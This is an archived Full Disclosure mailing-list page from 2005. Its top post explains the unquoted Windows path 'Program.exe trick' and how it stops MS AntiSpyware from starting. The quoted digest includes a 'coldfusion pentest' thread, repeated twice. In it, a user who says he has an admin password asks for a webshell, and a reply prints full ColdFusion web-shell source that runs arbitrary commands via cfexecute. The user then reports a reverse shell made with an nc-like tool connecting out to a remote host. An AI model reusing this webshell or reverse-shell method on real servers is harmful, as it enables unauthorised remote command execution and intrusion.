Full Disclosure mailing list archives
RE: Useless tidbit (MS AntiSpyware)
From: Steven Rakick <stevenrakick () yahoo com>
Date: Tue, 10 May 2005 07:30:03 -0700 (PDT)
Interesting. Has this always been that way? While it's not a huge gaping hole, it's definitely concerning. At least to me. Steve -----Original Message----- From: full-disclosure-bounces () lists grok org uk [mailto:full-disclosure-bounces () lists grok org uk] On Behalf Of pretty vacant Sent: Tuesday, May 10, 2005 9:53 AM To: James Tucker Cc: full-disclosure () lists grok org uk Subject: Re: [Full-disclosure] Useless tidbit You may or may not know that Windows applications often use the registry to store information about where to find applications within their file system. Due to the way in which Windows handles filenames, situations where this information is stored in an unquoted fashion, can leave the application open to an attack commonly referred to as the "Program.exe trick". As you know, it's quite common to have files and/or directories with spaces in the name (e.g. C:\Program Files). Windows is unique in that it essentially doesn't exactly know what it's doing if the command isn't quoted and contains spaces. For example look at the following command: c:\program files\windows media player\wmplayer If unquoted, Windows tries the following: 1st try Execute: c:\program.exe Arg1: files\windows Arg2: media Arg3: player\wmplayer 2nd try Execute: "c:\program files\windows.exe" Arg1: media Arg2: player\wmplayer 3rd try Execute: "c:\program files\windows media" Arg1: player\wmplayer 4th try Execute: "c:\program files\windows media player\mwplayer.exe" Well in the case of MS AntiSpyware (and hundreds of other applications), AntiSpyware, it starts up by executing "AntiSpywareMain.exe" which in turn displays a nice splash screen, performs some other misc activities before calling the gsasDtServ.exe. The problem is that the execution of gsasDtServ.exe is unquoted, while the app tries to execute c:\program files\microsoft antispyware\gsasDtServ.exe, if c:\program.exe exists, it will be executed instead and MS Antispyware never actually gets loaded. With XPSP2, the OS will actually warn you about files like c:\Program.bat, or c:\Program.exe, but not of c:\program files\internet.exe. Sadly, this isn't uncommon and when I tested this on my system the first time, 7 applications were executed over a 48 hour period. Try it for yourself. My Program.exe logs the executing user and command args to c:\program.log. On Tue, 10 May 2005, James Tucker wrote:
It appears this was a "trick" that I missed, can you provide more info?
thanks.
On 5/9/05, pretty vacant <optimist () eurocompton net> wrote:
Interesting tidbit. The old c:\program.exe trick prevents MS
Anti-Spyware from loading at login. :)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ full-disclosure-request () lists grok org uk wrote:Send Full-Disclosure mailing list submissions to full-disclosure () lists grok org uk To subscribe or unsubscribe via the World Wide Web, visit https://lists.grok.org.uk/mailman/listinfo/full-disclosure or, via email, send a message with subject or body 'help' to full-disclosure-request () lists grok org uk You can reach the person managing the list at full-disclosure-owner () lists grok org uk When replying, please edit your Subject line so it is more specific than "Re: Contents of Full-Disclosure digest..." Note to digest recipients - when replying to digest posts, please trim your post appropriately. Thank you. Today's Topics: 1. List Charter (John Cartwright) 2. Re: Fwd: GWAVA Sender Notification (Content filter) (James Tucker) 3. Re: coldfusion pentest (fatb) 4. Re: coldfusion pentest (fatb) ---------------------------------------------------------------------- Message: 1 Date: Tue, 10 May 2005 10:02:23 +0100 From: John Cartwright Subject: [Full-disclosure] List Charter To: full-disclosure () lists grok org uk Message-ID: <20050510090223.GA21817 () grok org uk> Content-Type: text/plain; charset=us-ascii Hi FYI: I have disabled monthly password reminders due to the increasing problem of archive sites storing them verbatim without filtering. Anyone running such an archive is encouraged to change their password if necessary. A password reminder is always available via the web interface in any case. Additionally I have moved to more secure random passwords for new members. Cheers - John [Full-Disclosure] Mailing List Charter John Cartwright - Introduction & Purpose - This document serves as a charter for the [Full-Disclosure] mailing list hosted at lists.grok.org.uk. The list was created on 9th July 2002 by Len Rose, and is primarily concerned with security issues and their discussion. The list is administered by John Cartwright. The Full-Disclosure list is hosted and sponsored by Secunia. - Subscription Information - Subscription/unsubscription may be performed via the HTTP interface located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure. Alternatively, commands may be emailed to full-disclosure-request () lists grok org uk, send the word 'help' in either the message subject or body for details. - Moderation & Management - The [Full-Disclosure] list is unmoderated. Typically posting will be restricted to members only, however the administrators may choose to accept submissions from non-members based on individual merit and relevance. It is expected that the list will be largely self-policing, however in special circumstances (eg spamming, misappropriation) then offending members may be removed from the list by the management. An archive of postings is available at http://lists.grok.org.uk/pipermail/full-disclosure/. - Acceptable Content - Any information pertaining to vulnerabilities is acceptable, for instance announcement and discussion thereof, exploit techniques and code, related tools and papers, and other useful information. Gratuitous advertisement, product placement, or self-promotion is forbidden. Disagreements, flames, arguments, and off-topic discussion should be taken off-list wherever possible. Humour is acceptable in moderation, providing it is inoffensive. Politics should be avoided at all costs. Members are reminded that due to the open nature of the list, they should use discretion in executing any tools or code distributed via this list. - Posting Guidelines - The primary language of this list is English. Members are expected to maintain a reasonable standard of netiquette when posting to the list. Quoting should not exceed that which is necessary to convey context, this is especially relevant to members subscribed to the digested version of the list. The use of HTML is discouraged, but not forbidden. Signatures will preferably be short and to the point, and those containing 'disclaimers' should be avoided where possible. Attachments may be included if relevant or necessary (e.g. PGP or S/MIME signatures, proof-of-concept code, etc) but must not be active (in the case of a worm, for example) or malicious to the recipient. Vacation messages should be carefully configured to avoid replying to list postings. Offenders will be excluded from the mailing list until the problem is corrected. Members may post to the list by emailing full-disclosure () lists grok org uk. Do not send subscription/ unsubscription mails to this address, use the -request address mentioned above. - Charter Additions/Changes - The list charter will be published at http://lists.grok.org.uk/full-disclosure-charter.html. In addition, the charter will be posted monthly to the list by the management. Alterations will be made after consultation with list members and a concensus has been reached. ------------------------------ Message: 2 Date: Tue, 10 May 2005 10:11:56 +0100 From: James Tucker Subject: Re: [Full-disclosure] Fwd: GWAVA Sender Notification (Content filter) To: "Valdis.Kletnieks () vt edu" Cc: full-disclosure () lists grok org uk Message-ID: Content-Type: text/plain; charset=ISO-8859-1 marketing is a "wonderful" thing. On 5/10/05, Valdis.Kletnieks () vt edu wrote:
On Tue, 10 May 2005 02:32:41 BST, James Tucker said:Surely this kind of message is a really bad idea.You know it, I know it, and the A/V vendors know it.What is the possible true business value of such a filter?The true business value is for the A/V vendor, who can blat out a free spam to the forged MAIL FROM: address (which is probably scraped off a disk by the worm/virus and therefor likely an actual address. In this case, the bozos at GWAVA can spam you about finding something they didn't consider acceptable.What is the potential impact upon security to disclose the information that this mail does?It demonstrates that the site running it is lame enough to still be running A/V software that spams people.What is the cost of deployment of this system against the costs related to it's potential, and actual effects?The GWAVA people don't care. They've been paid for the product already, and they're not the ones paying for the bandwidth. Remember - you're talking here about a market segment *founded* on the business model that *partially* patching some other vendor's broken software will lead to a permanent gravy train. Once you've wrapped your brain around the morals and ethics of that business model, it's obviously a very tiny step to spamming other people about the wonders of the product.
------------------------------ Message: 3 Date: Tue, 10 May 2005 17:12:00 +0800 From: "fatb" Subject: Re: [Full-disclosure] coldfusion pentest To: "Javier Reoyo" Cc: full-disclosure () lists grok org uk Message-ID: <007001c55540$cdd9d440$3801a8c0@bill> Content-Type: text/plain; charset="gb2312" thx :) the script from securiteam was from Kurt Grutzmacher originally,it could not run in my box and Im successful got a working shell by uploading a nc like tool and use the following script to run it arguments="-connect 1.1.1. 9999" timeout="20"> no matter how,I thought many guys who like me need a working cf webshell,because the upload script do not allow us to upload exe or some other kinds of files ----- Original Message ----- From: "Javier Reoyo" To: Sent: Tuesday, May 10, 2005 4:31 PM Subject: Re: [Full-disclosure] coldfusion pentest
Hi fatb, this is from mailing of securiteam. Try it. ColdFusion Web Shell ------------------------------------------------------------------------ SUMMARY DETAILS The following source code will generate a web based shell whenever it is executed under the ColdFusion environment. Tool source code: < html> < body> < cfoutput> < table> < form method="POST" action="cfexec.cfm"> < tr> < td>Command: < td> < input type=text name="cmd" size=50< cfif isdefined("form.cmd")> value="#form.cmd#" > < br> < tr> < td>Options: < td> < input type=text name="opts" size=50 < cfif isdefined("form.opts")> value="#form.opts#" >< br> < tr> < td>Timeout: < td>< input type=text name="timeout" size=4 < cfif isdefined("form.timeout")> value="#form.timeout#" < cfelse> value="5"< input type=submit value="Exec" > < cfsavecontent variable="myVar"> < cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout = "#Form.timeout#"> < pre> #myVar#
ADDITIONAL INFORMATION The information has been provided by Kurt Grutzmacher. ======================================== ----- Original Message ----- From: "fatb" To:
Cc: Sent: Tuesday, May 10, 2005 4:43 AM Subject: [Full-disclosure] coldfusion pentestHi all guys I've successed get the admin's passwd of the web interface and I can upload any kinds of files to the server the server is running coldfusion 4.5 with iis 5.0 but I can not find a coldfusion webshell to continue anybody could be kind enough to send me a working coldfusion webshell thx in advanced!---------------------------------------------------------------------------- ----_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
------------------------------ Message: 4 Date: Tue, 10 May 2005 17:19:59 +0800 From: "fatb" Subject: Re: [Full-disclosure] coldfusion pentest To: "Javier Reoyo" Cc: full-disclosure () lists grok org uk Message-ID: <007901c55541$7e11ad10$3801a8c0@bill> Content-Type: text/plain; charset="gb2312" thx :) the script from securiteam was from Kurt Grutzmacher originally,it could not run in my box and Im successful got a working shell by uploading a nc like tool and use the following script to run it arguments="-connect 1.1.1. 9999" timeout="20"> no matter how,I thought many guys who like me need a working cf webshell,because the upload script do not allow us to upload exe or some other kinds of files ----- Original Message ----- From: "Javier Reoyo" To: Sent: Tuesday, May 10, 2005 4:31 PM Subject: Re: [Full-disclosure] coldfusion pentest
Hi fatb, this is from mailing of securiteam. Try it. ColdFusion Web Shell ------------------------------------------------------------------------ SUMMARY DETAILS The following source code will generate a web based shell whenever it is executed under the ColdFusion environment. Tool source code: < html> < body> < cfoutput> < table> < form method="POST" action="cfexec.cfm"> < tr> < td>Command: < td> < input type=text name="cmd" size=50< cfif isdefined("form.cmd")> value="#form.cmd#" > < br> < tr> < td>Options: < td> < input type=text name="opts" size=50 < cfif isdefined("form.opts")> value="#form.opts#" >< br> < tr> < td>Timeout: < td>< input type=text name="timeout" size=4 < cfif isdefined("form.timeout")> value="#form.timeout#" < cfelse> value="5"< input type=submit value="Exec" > < cfsavecontent variable="myVar"> < cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout = "#Form.timeout#"> < pre> #myVar#
ADDITIONAL INFORMATION The information has been provided by Kurt Grutzmacher. ======================================== ----- Original Message ----- From: "fatb" To:
Cc: Sent: Tuesday, May 10, 2005 4:43 AM Subject: [Full-disclosure] coldfusion pentestHi all guys I've successed get the admin's passwd of the web interface and I can upload any kinds of files to the server the server is running coldfusion 4.5 with iis 5.0 but I can not find a coldfusion webshell to continue anybody could be kind enough to send me a working coldfusion webshell thx in advanced!---------------------------------------------------------------------------- ----_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
------------------------------ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ End of Full-Disclosure Digest, Vol 3, Issue 18 ********************************************** --------------------------------- Discover Yahoo! Use Yahoo! to plan a weekend, have fun online & more. Check it out!
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- RE: Useless tidbit (MS AntiSpyware) Steven Rakick (May 10)
- RE: Useless tidbit (MS AntiSpyware) Nick FitzGerald (May 10)
- Re: Useless tidbit (MS AntiSpyware) James Tucker (May 10)
- RE: Useless tidbit (MS AntiSpyware) Randall M (May 11)
- Re: Useless tidbit (MS AntiSpyware) byte busters (May 11)
- Re: Useless tidbit (MS AntiSpyware) Kurt Buff (May 11)
- Re: Useless tidbit (MS AntiSpyware) Valdis . Kletnieks (May 11)
- RE: Useless tidbit (MS AntiSpyware) Nick FitzGerald (May 10)
- <Possible follow-ups>
- Re: Useless tidbit (MS AntiSpyware) Des Ward (May 12)